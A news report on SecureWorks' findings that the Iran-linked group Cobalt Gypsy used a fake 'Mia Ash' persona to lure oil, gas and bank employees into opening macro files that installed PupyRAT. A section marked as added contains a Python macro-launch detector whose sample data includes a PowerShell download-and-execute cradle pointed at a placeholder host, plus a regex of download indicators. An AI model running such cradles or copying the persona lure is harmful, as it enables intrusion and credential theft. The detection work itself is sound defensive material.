SecureWorks uncovers female 'honey pot' cyber espionage campaign
Hacking group with Iranian ties pursues Saudi targets, seeking user credentials to their corporate networks
Employees of Saudi banking and oil and gas firms have been the target of a “honey pot” phishing campaign, researchers at a security company claim.
SecureWorks said a hacking group identified as the Iranian-linked cyber espionage hacker group Cobalt Gypsy lured the male employees using an online female persona “Mia Ash.”
The research team at SecureWorks, the Counter Threat Unit (CTU), discovered that Mia Ash is a fake female “honey pot” persona and believes it was created and is being run by Cobalt Gypsy, a.k.a. OilRig. The group is often called OilRig because it has historically targeted oil and gas, technology, engineering, aerospace and telecommunications companies in the Middle East.
The Mia Ash campaign was designed to obtain the high-level network credentials of male employees of specific target organisations in Saudi Arabia, India, the U.S., and Iraq.
In January 2017, SecureWorks discovered Cobalt Gypsy targeting Saudi financial, oil and technology executives with malware-laden phishing emails. The emails were sent from legitimate email addresses belonging to one of Saudi Arabia's biggest IT suppliers, the National Technology Group, and an Egyptian IT services firm, ITWorx. In 2015, the CTU also exposed an elaborate LinkedIn campaign conducted by Cobalt Gypsy, which the group used to con its victims.
The scam ran from 28 December 2016 through 1 January 2017. The messages varied in theme but all contained shortened URLs. Clicking the shortened URL caused a Word document to download and attempt to run a macro. The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT, an open source, cross-platform remote access trojan (RAT). If installed, PupyRAT gives the threat actor full access to the victim's system.
CTU researchers determined this activity was orchestrated by the Cobalt Gypsy threat group because of the tools, techniques, and procedures (TTPs) used in both campaigns. Specifically, Cobalt Gypsy has repeatedly targeted the organisations impacted by these recent campaigns; used social media, particularly LinkedIn, for target identification and interaction; and weaponised Excel documents with RATs like PupyRAT to infect its victims.
It is unclear exactly what information they were trying to steal, but the malware “Mia” attempted to install was targeting “network user credentials.”
The Mia Ash persona is a thin, attractive Caucasian woman with brown hair in her mid-twenties, purportedly living in London. She claimed to be a photographer at “Mia’s photography”.
She introduced herself as a wedding and portrait photographer reaching out to people around the world. Specifically she stated she was interested in learning more about the region in which the target resided.
Mia Ash had LinkedIn, Blogger, Facebook and WhatsApp accounts. She also had two email addresses.
The images she used in her social media accounts are believed to have been stolen from an actual photographer in Romania. The LinkedIn profile had over 500 connections, some of them photography related, most likely to make Mia Ash seem more legitimate. However, most of the connections work in regions, and for organisations, that would be of interest to the Cobalt Gypsy group.
In Saudi Arabia, the known targets were a technician for an oil and gas conglomerate, an IT technical support worker for a large bank, and an electrical engineer for a large construction and engineering firm. There were also targets in India and the US.
Most of her victims had mid-career level technology or engineering roles according to their job descriptions.
Anatomy of a scam
The victims are identified as Victim A and Victim B.
On January 12, Mia Ash reached out to an employee of a Middle Eastern company via her LinkedIn profile, and this employee’s company was sent a spearphish from Cobalt Gypsy in early January 2017. Mia then wanted to move the conversation to Facebook, but the victim preferred WhatsApp.
CTU researchers have assessed that Victim A is a real person and operates several social media accounts. According to several of these profiles, Victim A has over 10 years of experience in industries including oil/gas, aviation, and telecommunications. Victim A’s location, areas of stated expertise and past roles listed on their social media presence align with the observed interests of the COBALT GYPSY threat group. CTU researchers assert Victim A was or is a strategic target of the adversary.
In early January 2017, Cobalt Gypsy sent a spear phishing email containing the PupyRAT malware to the company that employed Victim B. This was not successful, so the group then reached out to Victim B via the Mia Ash LinkedIn profile and made a connection.
In February, after having befriended Victim B, she sent him a purported “photography survey” that contained the PupyRAT malware. Had it been opened, this malware would have given the hackers complete control of his computer and ultimately his network credentials.
On 12 February 2017, Victim B received at their personal email account a phish containing a Microsoft Excel document, “Copy of Photography Survey.xlsm”, encouraging the victim to open the message at work, using their work email account, in order for the survey to function properly. The survey contained macros that, once enabled, downloaded PupyRAT.
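Both delivery chains described above (the Word document in the December campaign and the “Photography Survey” Excel file) rely on an Office macro launching PowerShell to fetch a loader. The following is an added detection example, not code from SecureWorks or the original article: it scores constructed process-creation events (Sysmon-style, assumed field names) for an Office application spawning a script host with download or encoded-command indicators on its command line.

```python
import json
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); field names are assumed.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"host": "ws01", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "cmdline": "powershell.exe -NoP -W Hidden -Exec Bypass -c "
                           "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/l.ps1')\""}),
    json.dumps({"host": "ws02", "parent_image": r"C:\Windows\explorer.exe",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"}),
    json.dumps({"host": "ws03", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                "image": r"C:\Windows\System32\cmd.exe",
                "cmdline": "cmd.exe /c powershell -EncodedCommand SQBFAFgA..."}),
    json.dumps({"host": "ws04", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                "image": r"C:\Windows\splwow64.exe", "cmdline": "splwow64.exe 12288"}),
])

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments typical of a macro stager pulling a second stage over HTTP.
DOWNLOAD_PATTERNS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|"
    r"net\.webclient|-encodedcommand|start-bitstransfer",
    re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (severity, reasons) for one process-creation event; severity is None if benign."""
    reasons = []
    parent, child = basename(ev["parent_image"]), basename(ev["image"])
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        reasons.append(f"office app {parent} spawned {child}")
        if DOWNLOAD_PATTERNS.search(ev["cmdline"]):
            reasons.append("download/encoded-command indicators in command line")
    severity = "high" if len(reasons) == 2 else "medium" if reasons else None
    return severity, reasons

def detect(jsonl):
    """Run score_event over newline-delimited JSON events and return the alerts raised."""
    alerts = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        severity, reasons = score_event(ev)
        if severity:
            alerts.append({"host": ev["host"], "severity": severity, "reasons": reasons})
    return alerts
```

A printer-helper child such as splwow64.exe under Word is left alone, while Word spawning cmd.exe that in turn launches an encoded PowerShell command is still caught because the indicators are matched on the full command line.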
CTU researchers believe the Mia Ash persona was used to gain access to the targeted organisation because the first, broader campaign was unsuccessful.
Both IBM and Palo Alto have theorised that the PupyRAT malware was the initial infection vector for the destructive Shamoon attacks, which wiped out numerous computers of many large Middle Eastern companies and government organisations in November 2016 and January 2017.
This group hasn’t shown a major change in interest. Mia Ash was likely one of many personas it operates. SecureWorks believes the group's objectives really haven’t changed since the company first began tracking it in 2015.